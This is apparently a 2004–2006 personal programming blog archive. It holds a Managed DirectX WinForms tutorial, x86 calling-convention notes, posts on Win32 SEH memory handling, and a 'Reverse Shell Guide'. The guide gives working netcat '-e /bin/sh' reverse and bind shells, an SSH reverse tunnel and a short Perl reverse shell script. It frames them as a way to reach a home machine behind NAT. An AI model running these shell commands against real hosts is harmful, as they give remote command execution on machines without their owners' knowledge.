Meditation, The Art of Exploitation

Thinking? At last I have discovered it--thought; this alone is inseparable from me. I am, I exist--that is certain. But for how long? For as long as I am thinking. For it could be, that were I totally to cease from thinking, I should totally cease to exist....I am, then, in the strict sense only a thing that thinks.

Friday, May 26, 2006

Introduction

This article shows how to use .NET Windows Forms controls together with Managed DirectX (MDX) content. Most books and tutorials use a WinForm strictly for MDX rendering, but people are often more interested in combining regular WinForms controls with MDX. The question is frequently asked and rarely well answered. Here I present a small code project using .NET 2.0 and Visual Studio 2005.

Technique

The most important part of this project is the Direct3D device creation. Normally it's
device = new Device(0, DeviceType.Hardware, this, CreateFlags.SoftwareVertexProcessing, presentParams);
where 'this' refers to the Form hosting the content.
In order to let .NET controls such as a menu bar coexist with the DirectX content, I set up a panel for DirectX to render into:
private System.Windows.Forms.Panel panel1;
// Initialize panel1
device = new Device(0, DeviceType.Hardware, panel1, CreateFlags.SoftwareVertexProcessing, presentParams);
To demonstrate that this works, I have provided a simple Managed DirectX sample project that can be downloaded. The complete source code:

using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using Microsoft.DirectX;
using Microsoft.DirectX.Direct3D;

namespace Chapter1Code
{
/// <summary>
/// Summary description for Form1.
/// </summary>

public class Form1 : System.Windows.Forms.Form
{
private Device device = null;
/// <summary>
/// Required designer variable.
/// </summary>

private System.ComponentModel.Container components = null;
private Panel panel1;
private MenuStrip menuStrip1;
private ToolStripMenuItem mDXFormWithMenuToolStripMenuItem;
private ToolStripMenuItem exitToolStripMenuItem;
private float angle = 0.0f;

public Form1()
{
//
// Required for Windows Form Designer support
//
InitializeComponent();

this.Size = new Size(800, 600);
this.SetStyle(ControlStyles.AllPaintingInWmPaint | ControlStyles.Opaque, true);
}

/// <summary>
/// We will initialize our graphics device here
/// </summary>

public void InitializeGraphics()
{
// Set our presentation parameters
PresentParameters presentParams = new PresentParameters();

presentParams.Windowed = true;
presentParams.SwapEffect = SwapEffect.Discard;

// Create our device
device = new Device(0, DeviceType.Hardware, panel1, CreateFlags.SoftwareVertexProcessing, presentParams);
}

private void SetupCamera()
{
device.RenderState.CullMode = Cull.None;
device.Transform.World = Matrix.RotationAxis(new Vector3(angle / ((float)Math.PI * 2.0f), angle / ((float)Math.PI * 4.0f), angle / ((float)Math.PI * 6.0f)), angle / (float)Math.PI);
angle += 0.1f;

device.Transform.Projection = Matrix.PerspectiveFovLH((float)Math.PI / 4, (float)this.Width / this.Height, 1.0f, 100.0f); // cast avoids integer division for the aspect ratio
device.Transform.View = Matrix.LookAtLH(new Vector3(0,0, 5.0f), new Vector3(), new Vector3(0,1,0));
device.RenderState.Lighting = true;
}

protected override void OnPaint(System.Windows.Forms.PaintEventArgs e)
{
device.Clear(ClearFlags.Target, System.Drawing.Color.CornflowerBlue, 1.0f, 0);

SetupCamera();

CustomVertex.PositionNormalColored[] verts = new CustomVertex.PositionNormalColored[3];
verts[0].Position = new Vector3(0.0f, 1.0f, 1.0f);
verts[0].Normal = new Vector3(0.0f, 0.0f, -1.0f);
verts[0].Color = System.Drawing.Color.White.ToArgb();
verts[1].Position = new Vector3(-1.0f, -1.0f, 1.0f);
verts[1].Normal = new Vector3(0.0f, 0.0f, -1.0f);
verts[1].Color = System.Drawing.Color.White.ToArgb();
verts[2].Position = new Vector3(1.0f, -1.0f, 1.0f);
verts[2].Normal = new Vector3(0.0f, 0.0f, -1.0f);
verts[2].Color = System.Drawing.Color.White.ToArgb();

device.Lights[0].Type = LightType.Point;
device.Lights[0].Position = new Vector3();
device.Lights[0].Diffuse = System.Drawing.Color.White;
device.Lights[0].Attenuation0 = 0.2f;
device.Lights[0].Range = 10000.0f;

device.Lights[0].Enabled = true;

device.BeginScene();
device.VertexFormat = CustomVertex.PositionNormalColored.Format;
device.DrawUserPrimitives(PrimitiveType.TriangleList, 1, verts);
device.EndScene();

device.Present();

this.Invalidate();
}

/// <summary>
/// Clean up any resources being used.
/// </summary>

protected override void Dispose( bool disposing )
{
if( disposing )
{
if (components != null)
{
components.Dispose();
}
}
base.Dispose( disposing );
}

#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>

private void InitializeComponent()
{
this.panel1 = new System.Windows.Forms.Panel();
this.menuStrip1 = new System.Windows.Forms.MenuStrip();
this.mDXFormWithMenuToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.exitToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.menuStrip1.SuspendLayout();
this.SuspendLayout();
//
// panel1
//
this.panel1.Dock = System.Windows.Forms.DockStyle.Fill;
this.panel1.Location = new System.Drawing.Point(0, 24);
this.panel1.Name = "panel1";
this.panel1.Size = new System.Drawing.Size(307, 275);
this.panel1.TabIndex = 0;
//
// menuStrip1
//
this.menuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.mDXFormWithMenuToolStripMenuItem});
this.menuStrip1.Location = new System.Drawing.Point(0, 0);
this.menuStrip1.Name = "menuStrip1";
this.menuStrip1.Size = new System.Drawing.Size(307, 24);
this.menuStrip1.TabIndex = 1;
this.menuStrip1.Text = "menuStrip1";
//
// mDXFormWithMenuToolStripMenuItem
//
this.mDXFormWithMenuToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.exitToolStripMenuItem});
this.mDXFormWithMenuToolStripMenuItem.Name = "mDXFormWithMenuToolStripMenuItem";
this.mDXFormWithMenuToolStripMenuItem.Size = new System.Drawing.Size(117, 20);
this.mDXFormWithMenuToolStripMenuItem.Text = "MDX form with Menu";
//
// exitToolStripMenuItem
//
this.exitToolStripMenuItem.Name = "exitToolStripMenuItem";
this.exitToolStripMenuItem.Size = new System.Drawing.Size(152, 22);
this.exitToolStripMenuItem.Text = "Exit";
this.exitToolStripMenuItem.Click += new System.EventHandler(this.exitToolStripMenuItem_Click);
//
// Form1
//
this.ClientSize = new System.Drawing.Size(307, 299);
this.Controls.Add(this.panel1);
this.Controls.Add(this.menuStrip1);
this.Name = "Form1";
this.Text = "Form1";
this.menuStrip1.ResumeLayout(false);
this.menuStrip1.PerformLayout();
this.ResumeLayout(false);
this.PerformLayout();

}
#endregion

/// <summary>
/// The main entry point for the application.
/// </summary>

static void Main()
{
using (Form1 frm = new Form1())
{
// Show our form and initialize our graphics engine
frm.Show();
frm.InitializeGraphics();
Application.Run(frm);
}
}

private void exitToolStripMenuItem_Click(object sender, EventArgs e)
{
this.Dispose();
}
}
}

Tuesday, May 16, 2006

Reverse Shell Guide

In this little guide I'll quickly cover three very helpful methods to get a reverse shell on a host, using ssh, netcat or Perl. One may ask, why should I need a reverse shell? Let me elaborate on that.

People often have a computer in a personal LAN and use a router to get on the internet. These routers are usually NAT (Network Address Translation) routers, which means that, to the internet, the whole network appears to be just one computer.

From the outside, there is almost no way to find out how many computers are on the internal network (unless you are used to working with hping2). And even if you know a computer's IP on that network, you still couldn't reach it.

The situation looks like follows:

192.168.1.2 \
192.168.1.3 -\    +----------+
              \___|   NAT    |
                  |  Router  | <---- REQUEST
               ___| 192.168. |
192.168.1.4 __/   |   1.1    |
                  +----------+

When a request reaches the router, it doesn't know what to do with it and silently drops the packet. Connections made from inside the network go through the router, but a remote host cannot initiate a connection to one of the hosts in the network (unless the router supports port forwarding, which is often hard to configure properly).

But in this situation one could access one of the hosts inside the network using a reverse shell.

Note: From now on I'll refer to the computer you want to run the shell on as the remote host, and to the computer you want to send the commands from as your host.

Reverse Shell Using SSH

As said above, all connections must be made from inside of the network. That means, if someone wants to connect to one of the hosts inside of the network, the remote host has to establish the connection.

That is done with the following command (executed on the remote host):

ssh -NR 3333:localhost:22 user@yourhost

The -R switch tells SSH to set up a reverse tunnel (remote port forwarding). The -N switch tells SSH not to request a shell on the host it's connecting to, but just to establish the connection. 3333 is the port SSH will open on your host and tunnel back to port 22 on the remote host. This can also be something like 1337, but be sure to choose a number greater than 1024 unless you are root (the privileged ports up to 1024 can only be used by root).

If you are prompted for a password, supply your host's password.

Now there is a connection from the remote host, let's say 192.168.1.2, to your host. On your host SSH opens port 3333 as a gateway to the client 192.168.1.2. You can now issue the following command on your host:

ssh user@localhost -p 3333,
where user is the username to be used on 192.168.1.2.

Voilà, you have a working SSH connection to a computer inside of a NAT network!

Reverse Shell with Netcat

Even on a host that hasn't got an SSH daemon, there is still a way to connect to it.

There is a simple tool called netcat. Its manpage refers to it as the "TCP/IP swiss army knife". With netcat you can send out simple TCP/IP requests and receive the responses.

In addition to that, netcat can also listen on a specific port. It can even execute a program as soon as a client connects. That makes it perfect for opening up a reverse shell:

On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects):

netcat -v -l -p 3333

On the remote host, the following command has to be executed in order to establish a connection to your host:

netcat -e /bin/sh yourhost 3333

What these commands do is the following: You first set your netcat to listen for incoming connections and leave it waiting. Then you issue the command on the remote host, which will then connect to your host and—as soon as the connection has been established—will execute a shell.

Again, you have got a reverse shell, though that one is very minimal. You haven't even got a prompt. But still, you can execute commands.

Note: On some systems the program netcat may be called nc instead.

Netcat as a Replacement for SSH (though unencrypted)

If the remote host has no sshd installed (and maybe your host is behind a NAT router), netcat can also be used as a replacement for SSH.

On the remote host, execute a listening netcat that'll start a shell as soon as a client connects:
netcat -v -l -p 3333 -e /bin/sh

On your host, execute the connecting netcat:
netcat remotehost 3333

Reverse Shell with Perl

If there is no netcat installed on the remote machine, you can also try out this very minimal reverse shell written in Perl. It executes every command it receives directly. Because it doesn't run an interactive shell, there is no point in cd'ing to some directory. But you can still do things like echo foo >/tmp/foo.




#!/usr/bin/perl
use Socket;
$addr=sockaddr_in('3333',inet_aton('localhost'));
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
connect(S,$addr);select S;$|=1;
while(defined($l=<S>)){print qx($l);}
close(S);



This little piece of code tries to open a connection to localhost on port 3333. You'll want to change this to your machine, of course. So before you start the reverse shell, listen on port 3333 on your machine using netcat:

netcat -v -l -p 3333

Once you see that the reverse shell has connected you can start executing commands...

© 2005-2006 Julius Plenz

Noteworthy i386 listing of frequently used subroutines and typical function call protocol

Originally composed on June 13, 2004, edited formatting.


1. String length calculation and key comparison
mov ecx, -1             ; or: mov ecx, xx (xx = max possible length)
xor al, al              ; also seen as: mov al, 0 / sub eax, eax / mov eax, 0
mov edi, string_offset  ; or: lea edi, [ebp+XX]
                        ; ES:EDI -> string
repnz scasb             ; repnz scasw for wide characters
not ecx
dec ecx                 ; ecx = string length
mov edi, real_string    ; or: lea edi, [ebp+XX]
mov esi, user_string
repe cmpsb              ; repeat while ecx != 0 and [edi] == [esi]
test ecx, ecx
jnz bad
xor eax, eax            ; using eax = 0 as good; could also use eax = 1 as bad
jmp good
bad:
mov eax, 1
ret
good:
do_good_stuff           ; update registry, update ini file, update memory
ret

2. A==0? 1:0 translated to assembly
mov eax, A
neg eax ; eax = 0 - eax, unsigned, but sets CF if eax > 0
sbb eax, eax ; eax = eax - eax - CF
inc eax
ret
if A == 0,
neg eax => eax = 0, CF = 0
sbb eax, eax => eax = 0
inc eax => eax = 1
else
neg eax => eax = (UnSigned)-A, CF = 1
sbb eax, eax => eax = -1
inc eax => eax = 0
endif

An alternative form A == 0? 0:1
mov eax, A
cmp eax, 1 ; set CF if eax = 0, CF = 0 if A != 0
sbb eax, eax ; eax = -1 if A = 0, eax = 0 if A != 0
inc eax ; eax = 0 if A = 0, eax = 1 if A != 0
ret

A little bit mind-boggling, isn't it? :-)
These are common code signatures you will find in assembly language
generated from a high-level language (typically C/C++) by a compiler.
A final note: the counterpart of sbb is adc (add with carry). As an
exercise, build A == 0? 1:0 using adc instead of sbb.

3. The __cdecl, __stdcall, __fastcall, thiscall signatures and
__declspec(naked)
(Reference: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vclang/html/_core___stdcall.asp)

Normally a subroutine written in C/C++ is translated with the following
signatures. Take

int sub_a(arg1, arg2, arg3)
call sub_a(arg1, arg2, arg3)

There are four ways to declare its prototype, and the choice affects the generated
assembly code.
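To make this concrete at the source level, here is a minimal C++ sketch of where each keyword goes (MSVC syntax; the function names are hypothetical, and thiscall has no keyword of its own -- it is simply what the compiler uses for ordinary member functions):

int __cdecl    sub_cdecl   (int a, int b, int c);   // caller cleans the stack
int __stdcall  sub_stdcall (int a, int b, int c);   // callee cleans the stack
int __fastcall sub_fastcall(int a, int b, int c);   // a, b passed in ECX/EDX, callee cleans the rest
struct S {
    int sub_member(int a, int b, int c);            // thiscall: 'this' is passed in ECX
};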

3.1)
__cdecl:
This is the default calling convention for C and C++ programs.
Because the stack is cleaned up by the caller, it can do vararg functions.
The __cdecl calling convention creates larger executables than __stdcall,
because it requires each function call to include stack cleanup code.
The following list shows the implementation of this calling convention.

Element                            Implementation
Argument-passing order             Right to left
Stack-maintenance responsibility   Calling function pops the arguments from the stack
Name-decoration convention         Underscore character (_) is prefixed to names
Case-translation convention        No case translation performed

So what does all this babbling mean when it's in action?
Callee:
int __cdecl sub_a(arg1, arg2, arg3)
push ebp
mov ebp, esp
sub esp, 4 x number_of_local_automatic_variables <-- normally the case
; pointers could complicate it, and structure alignment requirement
; could also make the space required on stack seem strange.
; nevertheless, automatic variables are stored on the stack.
; name it NOLAV: # of local automatic variables
arg1 = [ebp+8] ; Here we assume it's a near call (*flat memory model)
arg2 = [ebp+C] ; within the caller's own code segment linear space
arg3 = [ebp+10] ; normally true but not for some trickery code ...
add esp, 4 x NOLAV
pop ebp
ret
; ebp+10 <- arg3                       ||  stack high
; ebp+0C <- arg2                       ||
; ebp+8  <- arg1                       ||
; ebp+4  <- eip of the return address  ||
; ebp    <- previous ebp               ||
;        <= esp = ebp pointer          \/  stack low

Caller: call sub_a(arg1, arg2, arg3)
push arg3 ; see below
push arg2
push arg1
call sub_a
add esp, 0C

Now, of course, this is simplified, because arg3 cannot be directly referenced in
assembly language. Very often it's something like this:
mov eax, [ebp+XX] ; passed on argument to this subroutine
push eax
or
mov eax, [ebp-XX] ; a LAV: local automatic variable
push eax
push XX ; a direct constant
mov eax, [XXXXXXXX] ; a global variable
push eax

I hope this clears up a lot of the confusion around subroutine calls in assembly
language. Now we briefly describe __stdcall, __fastcall, and thiscall.

3.2) __stdcall: The __stdcall calling convention is used to call Win32 API
functions. The callee cleans the stack, so the compiler makes vararg functions
__cdecl. Functions that use this calling convention require a function prototype:

return-type __stdcall function-name[(argument-list)]

The following list shows the implementation of this calling convention.

Element                            Implementation
Argument-passing order             Right to left
Argument-passing convention        By value, unless a pointer or reference type is passed
Stack-maintenance responsibility   Called function pops its own arguments from the stack
Name-decoration convention         An underscore (_) is prefixed to the name; the name is followed by the at sign (@) followed by the number of bytes (in decimal) in the argument list. Therefore, the function declared as int func( int a, double b ) is decorated as follows: _func@12
Case-translation convention        None

Callee:
int __stdcall sub_a(arg1, arg2, arg3)
push ebp
mov ebp, esp
sub esp, 4 x number_of_local_automatic_variables <-- normally the case
; pointers could complicate it, and structure alignment requirement
; could also make the space required on stack seem strange.
; nevertheless, automatic variables are stored on the stack.
; name it NOLAV: # of local automatic variables
arg1 = [ebp+8] ; Here we assume it's a near call (*flat memory model)
arg2 = [ebp+C] ; within the caller's own code segment linear space
arg3 = [ebp+10] ; normally true but not for some trickery code ...
add esp, 4 x NOLAV ; ebp+10 <- arg3 || stack high
pop ebp ; ebp+0C <- arg2 ||
ret 0C ; ebp+8 <- arg1 ||
; ebp+4 <- eip of the return address ||
; ebp <- previous ebp ||
<= esp = ebp pointer \/ stack low

The difference here is 'ret 0C' instead of 'ret' because in __stdcall the callee
is responsible to clean up the stack.

Caller: call sub_a(arg1, arg2, arg3)
push arg3 ; see below
push arg2
push arg1
call sub_a

Here, after call sub_a, the caller does not need to worry about stack cleanup.
There are two important points I want to bring up about __stdcall. First, WINAPI
is defined as __stdcall, so the Win32 API functions use this convention; it is the
most frequently encountered form on a Windows platform. Second, __stdcall mangles
(decorates) the subroutine name, which will cause trouble if you try to link against
a __stdcall subroutine built elsewhere. Unless you are working in a consistent
setting, try to avoid the __stdcall declaration.

3.3) __fastcall
The __fastcall calling convention specifies that arguments to functions are to be
passed in registers, when possible. The following list shows the implementation of
this calling convention.

Element                            Implementation
Argument-passing order             The first two DWORD or smaller arguments are passed in ECX and EDX registers; all other arguments are passed right to left
Stack-maintenance responsibility   Called function pops the arguments from the stack
Name-decoration convention         At sign (@) is prefixed to names; an at sign followed by the number of bytes (in decimal) in the parameter list is suffixed to names
Case-translation convention        No case translation performed

Callee: int __fastcall sub_a(arg1, arg2, arg3)

push ebp
mov ebp, esp
sub esp, 4 x NOLAV
arg1 = ecx      ; Here we assume it's a near call (*flat memory model)
arg2 = edx      ; within the caller's own code segment linear space
arg3 = [ebp+8]  ; normally true but not for some trickery code ...
add esp, 4 x NOLAV
pop ebp
ret 04          ; ebp+8 <- arg3                        ||  stack high
                ; ebp+4 <- eip of the return address   ||
                ; ebp   <- previous ebp                ||
                ;       <= esp = ebp pointer           \/  stack low

The difference here is 'ret 04' instead of 'ret' in __cdecl or 'ret 0C' in __stdcall,
because __fastcall passes two arguments in registers and the callee is responsible
for cleaning up the rest of the stack.

Caller:

call sub_a(arg1, arg2, arg3)
push arg3 ; see below
mov edx, arg2
mov ecx, arg1
call sub_a

__fastcall is similar to __stdcall, except that when the callee has fewer than three
arguments, no stack reference is needed for the arguments, so execution speed is
improved. Like __stdcall, subroutine names are also mangled in the library.

3.4) thiscall
The thiscall calling convention is used for C++ member functions that do not take
variable arguments. The this pointer is passed in the ECX register rather than on
the stack, the remaining arguments are pushed right to left, and, as with __stdcall,
the called function pops its own arguments from the stack. thiscall cannot be
specified explicitly in source code; it is simply what the compiler uses for such
member functions (a vararg member function falls back to __cdecl with this pushed last).

Callee: int sub_a(arg1, arg2, arg3) (a C++ member function, thiscall)
push ebp
mov ebp, esp
sub esp, 4 x NOLAV
arg1 = [ebp+8]  ; Here we assume it's a near call (*flat memory model)
arg2 = [ebp+0C] ; within the caller's own code segment linear space
arg3 = [ebp+10] ; normally true but not for some trickery code ...
this_pointer = ecx
add esp, 4 x NOLAV
pop ebp
ret 0C          ; ebp+10 <- arg3                       ||  stack high
                ; ebp+0C <- arg2                       ||
                ; ebp+8  <- arg1                       ||
                ; ebp+4  <- eip of the return address  ||
                ; ebp    <- previous ebp               ||
                ;        <= esp = ebp pointer          \/  stack low

Caller: call sub_a(arg1, arg2, arg3)
push arg3 ; see below
push arg2
push arg1
mov ecx, this_pointer
call sub_a

Pretty much like __stdcall except that the caller secretly puts the "this" pointer
into ecx before it calls sub_a.

3.5) __declspec(naked)
Callee: __declspec(naked) int sub_a(arg1, arg2, arg3){
__asm{
do whatever, but don't blow it up!
}
}
Unlike any of the above declaration decorations, this one is special in that it
will not set up the base stack frame pointer (ebp) for the callee. The callee
sub_a will normally be written in assembly code, and it is entirely up to sub_a
not to blow anything up! The compiler trusts that sub_a knows what it is doing. On
the caller side, nothing special needs to be done, although it's not unusual for a
chain of naked subroutines to be constructed to achieve some specific goal.

3.6) The default VC behavior when working with .C source code is __cdecl but
without the _ prefix. When working with .CPP source code, the function name is
automatically mangled unless prefixed with extern "C".

__declspec(dllexport) int a(int x, int y, int z){
int b = x+10;
return b+y+z;
}

.text:10001000                 public a
.text:10001000 a               proc near
.text:10001000
.text:10001000 var_4 = dword ptr -4
.text:10001000 arg_0 = dword ptr 8
.text:10001000 arg_4 = dword ptr 0Ch
.text:10001000 arg_8 = dword ptr 10h
.text:10001000
.text:10001000 push ebp
.text:10001001 mov ebp, esp
.text:10001003 push ecx
.text:10001004 mov eax, [ebp+arg_0]
.text:10001007 add eax, 0Ah
.text:1000100A mov [ebp+var_4], eax
.text:1000100D mov eax, [ebp+var_4]
.text:10001010 add eax, [ebp+arg_4]
.text:10001013 add eax, [ebp+arg_8]
.text:10001016 mov esp, ebp
.text:10001018 pop ebp
.text:10001019 retn
.text:10001019 a endp

Table of name generation
.C __declspec(dllexport) int a -> a
.C __declspec(dllexport) int __cdecl a -> a
.C __declspec(dllexport) int __stdcall a -> _a@12
.CPP __declspec(dllexport) int a -> ?a@@YAHHH@Z
.CPP extern "C" __declspec(dllexport) int a -> a
.CPP extern "C" __declspec(dllexport) int __stdcall a -> _a@12

So be careful when you name your files: .C and .CPP produce
drastically different function tables, so be sure to know what
you want and name your source code files accordingly.
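As a quick illustration of why the decoration matters at run time, here is a hedged sketch (the DLL and function names are hypothetical) that resolves the __stdcall export from the table above with GetProcAddress; ask for the undecorated name and the lookup simply returns NULL:

#include <windows.h>
#include <stdio.h>

typedef int (__stdcall *PFN_A)(int, int, int);

int main()
{
    HMODULE h = LoadLibraryA("a_dll.dll");   /* hypothetical DLL built from a .C file */
    if (h == NULL)
        return 1;
    /* Per the table above, a .C file exporting "int __stdcall a(int, int, int)"
       exposes it as "_a@12"; asking for plain "a" would fail here. */
    PFN_A fn = (PFN_A)GetProcAddress(h, "_a@12");
    if (fn != NULL)
        printf("a(1, 2, 3) = %d\n", fn(1, 2, 3));
    FreeLibrary(h);
    return 0;
}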

WIN32 SEH and Memory Management considered harmful (Part 3)

Originally composed on June 3rd, 2004, edited formatting.

Think about this problem again: is there a way to break this dilemma between the memory allocation constraint and the fault handling mechanism? If we could somehow manipulate the register value at the faulting machine instruction, we could change it to an updated memory address allocated inside the fault handler.

To achieve this, we will have to sacrifice code portability by directly embedding assembly code into the C source. Remember the code was like this:


code = (PPATCHCODE)VirtualAlloc(NULL, NR*sizeof(PATCHCODE),
MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
while(_ftscanf(inp, "%X%X%X", &addr, &o_val, &n_val) != EOF){
code[record].addr = addr;
code[record].orig_val = o_val;
code[record].new_val = n_val;
record++;
}


We will use EAX to contain the address that we will write the data into. The design is then to update EAX in the CONTEXT record delivered with the EXCEPTION_RECORD to the fault handler. After the fault handler returns, the CONTEXT record will have a new EAX value. The operating system switches to this new CONTEXT (the context of the process where the EXCEPTION occurred) and blindly accepts the new EAX value. Since the new EAX value now contains a valid memory address, the write operation will proceed. Without doing this, we have no way to control what the compiler might produce for the simple "code[record].addr = addr;". The new code snippet looks like this:


code = (PPATCHCODE)VirtualAlloc(NULL, NR*sizeof(PATCHCODE),
MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
while(_ftscanf(inp, "%X%X%X", &addr, &o_val, &n_val) != EOF){
paddr = code+record;
__asm{
mov eax, paddr;
mov ebx, addr;
mov [eax], ebx; <------- Fault occurs here.
mov ecx, dwsize;
mov ebx, o_val;
mov [eax+ecx], ebx;
// The compiler cannot generate correct code for
// mov [eax+dwsize], ebx
// it's translated to mov [eax+ebp-20], ebx
// we wanted mov [eax+[ebp-20]], ebx
// so just use hardcoded # here, mov [eax+4], ebx
// or use ecx to contain the number
mov ebx, n_val;
mov [eax+ecx*2], ebx
}
record++;
}


We first calculate the memory address of the patchcode record structure (which is padded and aligned to 16 bytes on the IA-32 platform) by adding the current record number to the starting address of the patchcode array. We then assign this address to EAX; this is the address the next write operation will access. The patch address value is assigned to EBX and then moved to the memory pointed to by EAX. If we ever access memory beyond what we initially allocated, we get a memory access violation at the instruction "mov [eax], ebx". After the exception occurs, execution is transferred to the user fault handler through a series of complicated operations: trap gate, kernel fault handler, compiler stub fault handler, and finally the user fault handler. In the fault handler we do exactly what was explained: we update the EAX value in the user process CONTEXT record:


tmp_code = (PPATCHCODE)VirtualAlloc(NULL, 2*NR*sizeof(PATCHCODE),
MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
memcpy(tmp_code, code, NR*sizeof(PATCHCODE)); /* raw copy; a string copy such as _tcsncpy would stop at embedded zero bytes */
VirtualFree(code, 0, MEM_RELEASE);
lpEP->ContextRecord->Eax = (ULONG)(tmp_code+NR);
NR=2*NR;
code = tmp_code;
nFilterResult = EXCEPTION_CONTINUE_EXECUTION;

First we allocate a memory space twice as large as the previous size, then copy the contents of the previous patchcode array into the new space. After we free the previously allocated memory, we update the EAX value in the user process CONTEXT. After some other bookkeeping, we return EXCEPTION_CONTINUE_EXECUTION to tell the kernel that this should be the last unwind fault handler, that the exception has been handled, and that execution should continue at the exact address where the fault occurred. Since EAX now holds the updated memory address, this code works.

Although this code works, it's not without the sacrifice of code portability, and it wastes memory allocation and data transfer inside the memory space. The use of embedded assembly code and of CONTEXT structure members prevents this code from working on any platform other than the 32-bit Intel architecture. The fault handler has to allocate new memory, transfer data from the previous memory to the new memory, and then free the previous memory: a waste of memory space and CPU time.
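To make the moving parts concrete, here is a minimal, self-contained sketch of the same idea (MSVC, 32-bit x86 only; the names are mine, not the article's): the __except filter grows the buffer, patches EAX in the faulting CONTEXT, and returns EXCEPTION_CONTINUE_EXECUTION so the mov is retried against the new block.

#include <windows.h>
#include <stdio.h>
#include <string.h>

static char*  g_buf  = NULL;
static SIZE_T g_size = 0;

/* Filter: grow the buffer, patch EAX in the faulting CONTEXT, retry the write. */
static int GrowAndRetry(EXCEPTION_POINTERS* ep)
{
    if (ep->ExceptionRecord->ExceptionCode != EXCEPTION_ACCESS_VIOLATION)
        return EXCEPTION_CONTINUE_SEARCH;

    char* bigger = (char*)VirtualAlloc(NULL, g_size * 2,
                                       MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (bigger == NULL)
        return EXCEPTION_CONTINUE_SEARCH;

    memcpy(bigger, g_buf, g_size);                       /* carry the old data over */
    VirtualFree(g_buf, 0, MEM_RELEASE);
    ep->ContextRecord->Eax = (DWORD)(bigger + g_size);   /* new target for the mov  */
    g_buf  = bigger;
    g_size = g_size * 2;
    return EXCEPTION_CONTINUE_EXECUTION;                 /* re-execute the faulting mov */
}

int main()
{
    g_size = 4096;
    g_buf  = (char*)VirtualAlloc(NULL, g_size,
                                 MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    SIZE_T i = 0;
    __try {
        while (i < 64 * 1024) {       // keep writing until we are well past the first page
            char* p = g_buf + i;
            __asm {
                mov eax, p            // force the target address into EAX
                mov byte ptr [eax], 0x41   // faults once i crosses the committed size
            }
            i++;
        }
    }
    __except (GrowAndRetry(GetExceptionInformation())) {
        // not reached: the filter either continues execution or keeps searching
    }
    printf("wrote %Iu bytes\n", i);
    VirtualFree(g_buf, 0, MEM_RELEASE);
    return 0;
}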

WIN32 SEH and Memory Management considered harmful (Part 2)

Originally composed on May 27, 2004, edited formatting.

We can pretty much exclude direct Win32 virtual memory management from the picture now and try to rely on another Win32 memory type, the Heap, to make this program work. Now our code looks like this:


except_handler(...){

HeapReAlloc(hhwnd, HEAP_REALLOC_IN_PLACE_ONLY, cur_mem, 2*cur_size);

return EXECUTION_CONTINUE;

if anything is wrong, return EXECUTION_SEARCH;
}

patcher(...){

hhwnd = HeapCreate(0,0,0)
cur_mem = HeapAlloc(hhwnd, initial_size);

__try{
read_data(FILE, tmp_data);
cur_mem[counter]->data = tmp_data;
counter++;
}
__except(except_handler(...)){
do_something;
}
}

Remember that this is just a pseudocode skeleton; you must do proper error checking and handling if you are writing real code. It looks nice that we are granted a HeapReAlloc function to dynamically adjust the allocated block size. However, there are two gotchas here.

First, the realloc function is unlikely to preserve the memory content of the previously allocated space. Second, this code simply flat-out does not work. What's wrong? We have avoided the C-ASM incoherence by reallocating at a fixed memory address with the HEAP_REALLOC_IN_PLACE_ONLY flag, and we also ensure the memory space is large enough. If you debug this code, though, you will discover that HeapReAlloc forever returns NULL. And you will also notice that the exception address is way beyond cur_mem+size.


|-----------| <- cur_mem
|           |
|           |
|-----------| <- cur_mem + size
|           |
|           |
|           |
|           | <- Exception happening here
|           |

The reason for all this is that the heap is designed to be a heavy-duty memory block, and the heap manager DOES NOT take care of out-of-bounds memory access. A more detailed heap structure looks like this:


+-----------+ <- Heap Real Start address
| |
| | <- Heap control structure
|-----------| <- some heap control block (the infamous first_free arena)
| | <- some random block if cur_mem wasn't allocated first
| |
|-----------| <- cur_mem
|header info|
| | <- cur_mem->size
|-----------|
|header info|
| |

Because the heap manager does not care about writes beyond a block's boundary, our code is actually writing way past its initially allocated memory space and corrupting the header info of the adjacent memory block, thus preventing HeapReAlloc from expanding its size. A simple heap allocation test will reveal that blocks allocated one after another do not have addresses that form a continuous space. Thus, by the time our code triggers the exception, it has already written through its boundary and corrupted the heap. Clearly SEH and Heap memory are mutually exclusive in Win32 programming.


Conclusions:

As good an idea as SEH may sound, we have demonstrated that in the Win32 environment SEH will not cooperate with Heap memory management, and that direct virtual memory allocation makes SEH redundant and, in practice, not working. The fact that a single line of C code cannot be guaranteed to execute atomically makes SEH debugging very difficult: the same code may produce different results depending on how it is compiled. The requirement of a fixed base address when working with virtual memory and SEH makes the effort of using SEH seem vain. In conclusion, SEH should be avoided when memory management is involved, although ironically one of the major reasons for SEH is to handle invalid memory access. Also, due to the volatile nature of the SEH and C interaction, extreme caution should be taken to ensure reproducible and predictable program execution.

WIN32 SEH and Memory Management considered harmful (Part 1)

Originally composed on May 27, 2004, edited formatting.

It so happens that I needed to write a small utility program to do some Win32 EXE file patching business, actually in this case two programs: one to generate a patch between two slightly different binary files and one to apply the patch to a fresh binary file. The first program, MakePatch, is relatively easy to cook up. However, the second program, Patcher, requires some special coding technique to be perfect (as we'll see very soon, the Win32 system has made it rather impossible).


The Patcher program first opens the patch code text file, which looks like this:

offset origin_byte new_byte
...

Each line of the patch code consists of an offset into the binary file to patch, the original byte expected at that offset, and the new byte to write. Since we have no foreknowledge of how many patch lines the patch code file contains, the program should dynamically adjust the size of the memory that holds these patch codes as they are read in.
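For reference, here is a hedged sketch of the record type these articles appear to assume; the field names follow the snippet shown in Part 3 above, and the 16-byte padding is only my reading of the alignment remark there:

typedef struct _PATCHCODE {
    unsigned long addr;      /* offset in the binary file to patch   */
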